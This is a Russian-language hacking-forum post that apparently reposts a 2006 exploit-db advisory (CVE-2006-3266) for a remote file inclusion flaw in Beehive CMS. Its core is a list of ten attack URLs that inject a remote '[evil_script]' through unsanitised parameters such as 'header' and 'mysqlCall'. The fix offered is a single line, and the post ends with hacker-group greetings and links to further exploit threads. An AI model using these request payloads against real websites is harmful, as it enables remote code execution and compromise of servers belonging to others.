Exploit MagNet BeeHive CMS (header) - Remote File Inclusion

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
1951
Проверка EDB
  1. Пройдено
Автор
KW3[R]LN
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-3266
Дата публикации
2006-06-25
Код: 
---------------------------------------------------------------------------
Beehive CMS ([header]) Remote File Include Vulnerabilities
---------------------------------------------------------------------------

Discovered By Kw3[R]Ln [ Romanian Security Team ]
Remote : Yes
Critical Level : Dangerous

---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Beehive CMS
version : latest version
URL : http://products.magnet-i.com/show/beehive/

------------------------------------------------------------------
Exploit:
~~~~~~~~

Variable $header not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.


# http://www.site.com/[path]/conad/include/rootGui.inc.php?header=[evil_script]
# http://www.site.com/[path]/conad/changeEmail.inc.php?mysqlCall=[evil_script]
# http://www.site.com/[path]/conad/changeUserDetails.inc.php?mysqlCall=[evil_script]
# http://www.site.com/[path]/conad/checkPasswd.inc.php?mysqlCall=[evil_script]
# http://www.site.com/[path]/conad/login.inc.php?mysqlCall=[evil_script]
# http://www.site.com/[path]/conad/logout.inc.php?mysqlCall=[evil_script]
# http://www.site.com/[path]/include/listall.inc.php?mysqlcall=[evil_script]
# http://www.site.com/[path]/show/index.php?prefix=[evil_script]
# http://www.site.com/[path]/conad/include/mysqlCall.inc.php?config=[evil_script]
# http://www.site.com/[path]/include/rootGui.inc.php?header=[evil_script]

---------------------------------------------------------------------------


Solution :
~~~~~~~~~~

declare variabel $header
---------------------------------------------------------------------------


Shoutz:
~~~~~~

# Special greetz to my good friend [Oo]
# To all members of h4cky0u.org ;) and Romanian Security Team [ hTTp://Romania.HackTECK.BE ]
---------------------------------------------------------------------------

*/

Contact:
~~~~~~~~
Nick: Kw3rLN
E-mail: ciriboflacs[at]YaHoo[dot]Com
Homepage: hTTp://Romania.HackTECK.BE & http://www.h4cky0u.org/
/*

-------------------------------- [ EOF] ----------------------------------

# milw0rm.com [2006-06-25]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Oracle BeeHive 2 - 'voice-servlet processEvaluation()' Write File (Metasploit)
Ответы
0
Просмотры
439
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Oracle BeeHive 2 - 'voice-servlet prepareAudioToPlay()' Arbitrary File Upload (Metasploit)
Ответы
0
Просмотры
460
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Beehive Forum 101 - Multiple Cross-Site Scripting Vulnerabilities
Ответы
0
Просмотры
415
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Beehive Forum 0.6.2 - 'index.php' SQL Injection
Ответы
0
Просмотры
348
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Beehive Forum 0.6.2 - Multiple HTML Injection Vulnerabilities
Ответы
0
Просмотры
361
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Beehive Forum 0.7.1 - 'links.php' Multiple Cross-Site Scripting Vulnerabilities
Ответы
0
Просмотры
316
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Trend Micro OfficeScan 11.0/XG (12.0) - 'Host' Header Injection
Ответы
0
Просмотры
709
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit)
Ответы
0
Просмотры
614
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WordPress Plugin PHPMailer 4.6 - Host Header Command Injection (Metasploit)
Ответы
0
Просмотры
674
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Concrete5 CMS 8.1.0 - 'Host' Header Injection
Ответы
0
Просмотры
649
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу